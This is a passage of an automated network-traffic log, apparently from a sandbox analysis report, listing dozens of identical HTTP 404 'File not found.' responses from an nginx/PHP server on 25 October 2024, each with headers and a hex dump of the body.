Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.26.1Date: Fri, 25 Oct 2024 08:20:08 GMTContent-Type: text/html; charset=UTF-8Content-Length: 23Connection: closeX-Powered-By: PHP/5.4.16Status: 404 Not FoundData Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.26.1Date: Fri, 25 Oct 2024 08:20:10 GMTContent-Type: text/html; charset=UTF-8Content-Length: 23Connection: closeX-Powered-By: PHP/5.4.16Status: 404 Not FoundData Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.26.1Date: Fri, 25 Oct 2024 08:20:11 GMTContent-Type: text/html; charset=UTF-8Content-Length: 23Connection: closeX-Powered-By: PHP/5.4.16Status: 404 Not FoundData Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.26.1Date: Fri, 25 Oct 2024 08:20:13 GMTContent-Type: text/html; charset=UTF-8Content-Length: 23Connection: closeX-Powered-By: PHP/5.4.16Status: 404 Not FoundData Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.26.1Date: Fri, 25 Oct 2024 08:20:14 GMTContent-Type: text/html; charset=UTF-8Content-Length: 23Connection: closeX-Powered-By: PHP/5.4.16Status: 404 Not FoundData Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.26.1Date: Fri, 25 Oct 2024 08:20:15 GMTContent-Type: text/html; charset=UTF-8Content-Length: 23Connection: closeX-Powered-By: PHP/5.4.16Status: 404 Not FoundData Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.26.1Date: Fri, 25 Oct 2024 08:20:16 GMTContent-Type: text/html; charset=UTF-8Content-Length: 23Connection: closeX-Powered-By: PHP/5.4.16Status: 404 Not FoundData Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.26.1Date: Fri, 25 Oct 2024 08:20:17 GMTContent-Type: text/html; charset=UTF-8Content-Length: 23Connection: closeX-Powered-By: PHP/5.4.16Status: 404 Not FoundData Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.26.1Date: Fri, 25 Oct 2024 08:20:19 GMTContent-Type: text/html; charset=UTF-8Content-Length: 23Connection: closeX-Powered-By: PHP/5.4.16Status: 404 Not FoundData Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.26.1Date: Fri, 25 Oct 2024 08:20:20 GMTContent-Type: text/html; charset=UTF-8Content-Length: 23Connection: closeX-Powered-By: PHP/5.4.16Status: 404 Not FoundData Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.26.1Date: Fri, 25 Oct 2024 08:20:20 GMTContent-Type: text/html; charset=UTF-8Content-Length: 23Connection: closeX-Powered-By: PHP/5.4.16Status: 404 Not FoundData Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.26.1Date: Fri, 25 Oct 2024 08:20:20 GMTContent-Type: text/html; charset=UTF-8Content-Length: 23Connection: closeX-Powered-By: PHP/5.4.16Status: 404 Not FoundData Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.26.1Date: Fri, 25 Oct 2024 08:20:22 GMTContent-Type: text/html; charset=UTF-8Content-Length: 23Connection: closeX-Powered-By: PHP/5.4.16Status: 404 Not FoundData Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.26.1Date: Fri, 25 Oct 2024 08:20:23 GMTContent-Type: text/html; charset=UTF-8Content-Length: 23Connection: closeX-Powered-By: PHP/5.4.16Status: 404 Not FoundData Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.26.1Date: Fri, 25 Oct 2024 08:20:24 GMTContent-Type: text/html; charset=UTF-8Content-Length: 23Connection: closeX-Powered-By: PHP/5.4.16Status: 404 Not FoundData Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.26.1Date: Fri, 25 Oct 2024 08:20:25 GMTContent-Type: text/html; charset=UTF-8Content-Length: 23Connection: closeX-Powered-By: PHP/5.4.16Status: 404 Not FoundData Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.26.1Date: Fri, 25 Oct 2024 08:20:26 GMTContent-Type: text/html; charset=UTF-8Content-Length: 23Connection: closeX-Powered-By: PHP/5.4.16Status: 404 Not FoundData Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.26.1Date: Fri, 25 Oct 2024 08:20:28 GMTContent-Type: text/html; charset=UTF-8Content-Length: 23Connection: closeX-Powered-By: PHP/5.4.16Status: 404 Not FoundData Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.26.1Date: Fri, 25 Oct 2024 08:20:30 GMTContent-Type: text/html; charset=UTF-8Content-Length: 23Connection: closeX-Powered-By: PHP/5.4.16Status: 404 Not FoundData Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.26.1Date: Fri, 25 Oct 2024 08:20:31 GMTContent-Type: text/html; charset=UTF-8Content-Length: 23Connection: closeX-Powered-By: PHP/5.4.16Status: 404 Not FoundData Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.26.1Date: Fri, 25 Oct 2024 08:20:32 GMTContent-Type: text/html; charset=UTF-8Content-Length: 23Connection: closeX-Powered-By: PHP/5.4.16Status: 404 Not FoundData Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.26.1Date: Fri, 25 Oct 2024 08:20:34 GMTContent-Type: text/html; charset=UTF-8Content-Length: 23Connection: closeX-Powered-By: PHP/5.4.16Status: 404 Not FoundData Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.26.1Date: Fri, 25 Oct 2024 08:20:35 GMTContent-Type: text/html; charset=UTF-8Content-Length: 23Connection: closeX-Powered-By: PHP/5.4.16Status: 404 Not FoundData Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.26.1Date: Fri, 25 Oct 2024 08:20:36 GMTContent-Type: text/html; charset=UTF-8Content-Length: 23Connection: closeX-Powered-By: PHP/5.4.16Status: 404 Not FoundData Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.26.1Date: Fri, 25 Oct 2024 08:20:37 GMTContent-Type: text/html; charset=UTF-8Content-Length: 23Connection: closeX-Powered-By: PHP/5.4.16Status: 404 Not FoundData Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.26.1Date: Fri, 25 Oct 2024 08:20:39 GMTContent-Type: text/html; charset=UTF-8Content-Length: 23Connection: closeX-Powered-By: PHP/5.4.16Status: 404 Not FoundData Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.26.1Date: Fri, 25 Oct 2024 08:20:40 GMTContent-Type: text/html; charset=UTF-8Content-Length: 23Connection: closeX-Powered-By: PHP/5.4.16Status: 404 Not FoundData Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.26.1Date: Fri, 25 Oct 2024 08:20:41 GMTContent-Type: text/html; charset=UTF-8Content-Length: 23Connection: closeX-Powered-By: PHP/5.4.16Status: 404 Not FoundData Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.26.1Date: Fri, 25 Oct 2024 08:20:43 GMTContent-Type: text/html; charset=UTF-8Content-Length: 23Connection: closeX-Powered-By: PHP/5.4.16Status: 404 Not FoundData Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.26.1Date: Fri, 25 Oct 2024 08:20:44 GMTContent-Type: text/html; charset=UTF-8Content-Length: 23Connection: closeX-Powered-By: PHP/5.4.16Status: 404 Not FoundData Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.26.1Date: Fri, 25 Oct 2024 08:20:45 GMTContent-Type: text/html; charset=UTF-8Content-Length: 23Connection: closeX-Powered-By: PHP/5.4.16Status: 404 Not FoundData Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.26.1Date: Fri, 25 Oct 2024 08:20:46 GMTContent-Type: text/html; charset=UTF-8Content-Length: 23Connection: closeX-Powered-By: PHP/5.4.16Status: 404 Not FoundData Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.26.1Date: Fri, 25 Oct 2024 08:20:47 GMTContent-Type: text/html; charset=UTF-8Content-Length: 23Connection: closeX-Powered-By: PHP/5.4.16Status: 404 Not FoundData Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.26.1Date: Fri, 25 Oct 2024 08:20:49 GMTContent-Type: text/html; charset=UTF-8Content-Length: 23Connection: closeX-Powered-By: PHP/5.4.16Status: 404 Not FoundData Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.26.1Date: Fri, 25 Oct 2024 08:20:50 GMTContent-Type: text/html; charset=UTF-8Content-Length: 23Connection: closeX-Powered-By: PHP/5.4.16Status: 404 Not FoundData Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.26.1Date: Fri, 25 Oct 2024 08:20:51 GMTContent-Type: text/html; charset=UTF-8Content-Length: 23Connection: closeX-Powered-By: PHP/5.4.16Status: 404 Not FoundData Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.26.1Date: Fri, 25 Oct 2024 08:20:52 GMTContent-Type: text/html; charset=UTF-8Content-Length: 23Connection: closeX-Powered-By: PHP/5.4.16Status: 404 Not FoundData Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.26.1Date: Fri, 25 Oct 2024 08:20:53 GMTContent-Type: text/html; charset=UTF-8Content-Length: 23Connection: closeX-Powered-By: PHP/5.4.16Status: 404 Not FoundData Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.26.1Date: Fri, 25 Oct 2024 08:20:55 GMTContent-Type: text/html; charset=UTF-8Content-Length: 23Connection: closeX-Powered-By: PHP/5.4.16Status: 404 Not FoundData Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.26.1Date: Fri, 25 Oct 2024 08:20:56 GMTContent-Type: text/html; charset=UTF-8Content-Length: 23Connection: closeX-Powered-By: PHP/5.4.16Status: 404 Not FoundData Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.26.1Date: Fri, 25 Oct 2024 08:20:57 GMTContent-Type: text/html; charset=UTF-8Content-Length: 23Connection: closeX-Powered-By: PHP/5.4.16Status: 404 Not FoundData Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.26.1Date: Fri, 25 Oct 2024 08:20:58 GMTContent-Type: text/html; charset=UTF-8Content-Length: 23Connection: closeX-Powered-By: PHP/5.4.16Status: 404 Not FoundData Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.26.1Date: Fri, 25 Oct 2024 08:20:59 GMTContent-Type: text/html; charset=UTF-8Content-Length: 23Connection: closeX-Powered-By: PHP/5.4.16Status: 404 Not FoundData Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.26.1Date: Fri, 25 Oct 2024 08:21:01 GMTContent-Type: text/html; charset=UTF-8Content-Length: 23Connection: closeX-Powered-By: PHP/5.4.16Status: 404 Not FoundData Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.26.1Date: Fri, 25 Oct 2024 08:21:02 GMTContent-Type: text/html; charset=UTF-8Content-Length: 23Connection: closeX-Powered-By: PHP/5.4.16Status: 404 Not FoundData Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.26.1Date: Fri, 25 Oct 2024 08:21:03 GMTContent-Type: text/html; charset=UTF-8Content-Length: 23Connection: closeX-Powered-By: PHP/5.4.16Status: 404 Not FoundData Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.26.1Date: Fri, 25 Oct 2024 08:21:05 GMTContent-Type: text/html; charset=UTF-8Content-Length: 23Connection: closeX-Powered-By: PHP/5.4.16Status: 404 Not FoundData Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.26.1Date: Fri, 25 Oct 2024 08:21:06 GMTContent-Type: text/html; charset=UTF-8Content-Length: 23Connection: closeX-Powered-By: PHP/5.4.16Status: 404 Not FoundData Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.26.1Date: Fri, 25 Oct 2024 08:21:07 GMTContent-Type: text/html; charset=UTF-8Content-Length: 23Connection: closeX-Powered-By: PHP/5.4.16Status: 404 Not FoundData Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.26.1Date: Fri, 25 Oct 2024 08:21:08 GMTContent-Type: text/html; charset=UTF-8Content-Length: 23Connection: closeX-Powered-By: PHP/5.4.16Status: 404 Not FoundData Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.26.1Date: Fri, 25 Oct 2024 08:21:09 GMTContent-Type: text/html; charset=UTF-8Content-Length: 23Connection: closeX-Powered-By: PHP/5.4.16Status: 404 Not FoundData Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.26.1Date: Fri, 25 Oct 2024 08:21:11 GMTContent-Type: text/html; charset=UTF-8Content-Length: 23Connection: closeX-Powered-By: PHP/5.4.16Status: 404 Not FoundData Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.26.1Date: Fri, 25 Oct 2024 08:21:12 GMTContent-Type: text/html; charset=UTF-8Content-Length: 23Connection: closeX-Powered-By: PHP/5.4.16Status: 404 Not FoundData Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.26.1Date: Fri, 25 Oct 2024 08:21:13 GMTContent-Type: text/html; charset=UTF-8Content-Length: 23Connection: closeX-Powered-By: PHP/5.4.16Status: 404 Not FoundData Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.26.1Date: Fri, 25 Oct 2024 08:21:14 GMTContent-Type: text/html; charset=UTF-8Content-Length: 23Connection: closeX-Powered-By: PHP/5.4.16Status: 404 Not FoundData Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.26.1Date: Fri, 25 Oct 2024 08:21:15 GMTContent-Type: text/html; charset=UTF-8Content-Length: 23Connection: closeX-Powered-By: PHP/5.4.16Status: 404 Not FoundData Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.26.1Date: Fri, 25 Oct 2024 08:21:17 GMTContent-Type: text/html; charset=UTF-8Content-Length: 23Connection: closeX-Powered-By: PHP/5.4.16Status: 404 Not FoundData Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.26.1Date: Fri, 25 Oct 2024 08:21:18 GMTContent-Type: text/html; charset=UTF-8Content-Length: 23Connection: closeX-Powered-By: PHP/5.4.16Status: 404 Not FoundData Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.26.1Date: Fri, 25 Oct 2024 08:21:20 GMTContent-Type: text/html; charset=UTF-8Content-Length: 23Connection: closeX-Powered-By: PHP/5.4.16Status: 404 Not FoundData Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.26.1Date: Fri, 25 Oct 2024 08:21:21 GMTContent-Type: text/html; charset=UTF-8Content-Length: 23Connection: closeX-Powered-By: PHP/5.4.16Status: 404 Not FoundData Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.26.1Date: Fri, 25 Oct 2024 08:21:22 GMTContent-Type: text/html; charset=UTF-8Content-Length: 23Connection: closeX-Powered-By: PHP/5.4.16Status: 404 Not FoundData Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.26.1Date: Fri, 25 Oct 2024 08:21:23 GMTContent-Type: text/html; charset=UTF-8Content-Length: 23Connection: closeX-Powered-By: PHP/5.4.16Status: 404 Not FoundData Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.26.1Date: Fri, 25 Oct 2024 08:21:24 GMTContent-Type: text/html; charset=UTF-8Content-Length: 23Connection: closeX-Powered-By: PHP/5.4.16Status: 404 Not FoundData Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.26.1Date: Fri, 25 Oct 2024 08:21:26 GMTContent-Type: text/html; charset=UTF-8Content-Length: 23Connection: closeX-Powered-By: PHP/5.4.16Status: 404 Not FoundData Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.26.1Date: Fri, 25 Oct 2024 08:21:27 GMTContent-Type: text/html; charset=UTF-8Content-Length: 23Connection: closeX-Powered-By: PHP/5.4.16Status: 404 Not FoundData Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.26.1Date: Fri, 25 Oct 2024 08:21:28 GMTContent-Type: text/html; charset=UTF-8Content-Length: 23Connection: closeX-Powered-By: PHP/5.4.16Status: 404 Not FoundData Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.26.1Date: Fri, 25 Oct 2024 08:21:29 GMTContent-Type: text/html; charset=UTF-8Content-Length: 23Connection: closeX-Powered-By: PHP/5.4.16Status: 404 Not FoundData Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.26.1Date: Fri, 25 Oct 2024 08:21:30 GMTContent-Type: text/html; charset=UTF-8Content-Length: 23Connection: closeX-Powered-By: PHP/5.4.16Status: 404 Not FoundData Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.26.1Date: Fri, 25 Oct 2024 08:21:32 GMTContent-Type: text/html; charset=UTF-8Content-Length: 23Connection: closeX-Powered-By: PHP/5.4.16Status: 404 Not FoundData Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.26.1Date: Fri, 25 Oct 2024 08:21:33 GMTContent-Type: text/html; charset=UTF-8Content-Length: 23Connection: closeX-Powered-By: PHP/5.4.16Status: 404 Not FoundData Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.26.1Date: Fri, 25 Oct 2024 08:21:34 GMTContent-Type: text/html; charset=UTF-8Content-Length: 23Connection: closeX-Powered-By: PHP/5.4.16Status: 404 Not FoundData Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.26.1Date: Fri, 25 Oct 2024 08:21:35 GMTContent-Type: text/html; charset=UTF-8Content-Length: 23Connection: closeX-Powered-By: PHP/5.4.16Status: 404 Not FoundData Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.26.1Date: Fri, 25 Oct 2024 08:21:36 GMTContent-Type: text/html; charset=UTF-8Content-Length: 23Connection: closeX-Powered-By: PHP/5.4.16Status: 404 Not FoundData Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.26.1Date: Fri, 25 Oct 2024 08:21:37 GMTContent-Type: text/html; charset=UTF-8Content-Length: 23Connection: closeX-Powered-By: PHP/5.4.16Status: 404 Not FoundData Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.
